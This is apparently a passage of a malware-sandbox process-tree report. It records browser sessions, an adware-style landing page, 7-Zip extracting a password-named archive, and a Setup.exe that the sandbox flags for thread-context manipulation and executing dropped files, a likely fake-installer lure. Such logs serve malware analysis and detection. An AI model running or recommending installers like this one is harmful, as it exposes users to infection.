                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
                                                                  3⤵
                                                                    PID:3020
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
                                                                    3⤵
                                                                      PID:2868
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.safetyoptimizer.com/lp/lp1.aspx?cfg=6
                                                                    2⤵
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                    PID:1468
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c64718
                                                                      3⤵
                                                                        PID:4744
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                                                                        3⤵
                                                                          PID:3228
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
                                                                          3⤵
                                                                            PID:3772
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
                                                                            3⤵
                                                                              PID:5044
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                                                                              3⤵
                                                                                PID:3740
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                                                3⤵
                                                                                  PID:212
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
                                                                                  3⤵
                                                                                    PID:3088
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:8
                                                                                    3⤵
                                                                                      PID:1840
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:8
                                                                                      3⤵
                                                                                        PID:2344
                                                                                    • C:\Program Files (x86)\Spyware Terminator\Tools\analyzefile.exe
                                                                                      "C:\Program Files (x86)\Spyware Terminator\Tools\analyzefile.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3824
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4868
                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4356
                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                        1⤵
                                                                                          PID:2908
                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3212
                                                                                          • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
                                                                                            "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /SCANCONT "C:\Users\Admin\AppData\Local\Temp\STShellMenu_E61F685.txt"
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1508
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                            1⤵
                                                                                            • Enumerates system info in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1900
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffac01dcc40,0x7ffac01dcc4c,0x7ffac01dcc58
                                                                                              2⤵
                                                                                                PID:1844
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:2
                                                                                                2⤵
                                                                                                  PID:3540
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:3
                                                                                                  2⤵
                                                                                                    PID:5112
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2300 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:880
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:1864
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3420 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:3568
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4592,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:4436
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3736,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4116
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:5040
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4968,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5000 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:4336
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:3056
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4620
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5224,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:2080
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4760 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:2460
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:3736
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4864,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:2
                                                                                                                            2⤵
                                                                                                                              PID:2292
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5304,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:2908
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3352,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3344 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:4364
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5496,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5296 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:388
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5164,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4836 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:4604
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4836,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3420 /prefetch:1
                                                                                                                                      2⤵
                                                                                                                                        PID:2988
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=3192,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5132 /prefetch:1
                                                                                                                                        2⤵
                                                                                                                                          PID:3508
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5368,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:1
                                                                                                                                          2⤵
                                                                                                                                            PID:4964
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5128,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:1
                                                                                                                                            2⤵
                                                                                                                                              PID:1628
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=4128,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:1
                                                                                                                                              2⤵
                                                                                                                                                PID:2172
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5612,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5808 /prefetch:1
                                                                                                                                                2⤵
                                                                                                                                                  PID:3512
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=240,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4124 /prefetch:8
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1532
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5844,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6152 /prefetch:8
                                                                                                                                                    2⤵
                                                                                                                                                      PID:920
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6160,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6184 /prefetch:1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:328
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5848,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5960 /prefetch:8
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4400
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5728,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6420 /prefetch:8
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4316
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=6416,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1524 /prefetch:1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1112
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6464,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6468 /prefetch:1
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4208
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6676,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6644 /prefetch:8
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3976
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6780,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6784 /prefetch:8
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2456
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6308,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6500 /prefetch:1
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2864
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6920,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5400 /prefetch:1
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4412
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6800,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6532 /prefetch:8
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3696
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3924
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4144
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:844
                                                                                                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                              C:\Windows\system32\AUDIODG.EXE 0x4fc 0x3e0
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4788
                                                                                                                                                                              • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap27291:138:7zEvent21663
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2624
                                                                                                                                                                                • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\" -an -ai#7zMap22842:210:7zEvent6884
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:476
                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /SCANCONT "C:\Users\Admin\AppData\Local\Temp\STShellMenu_E6367B8.txt"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:2240
                                                                                                                                                                                  • C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe
                                                                                                                                                                                    "C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    • Executes dropped EXE
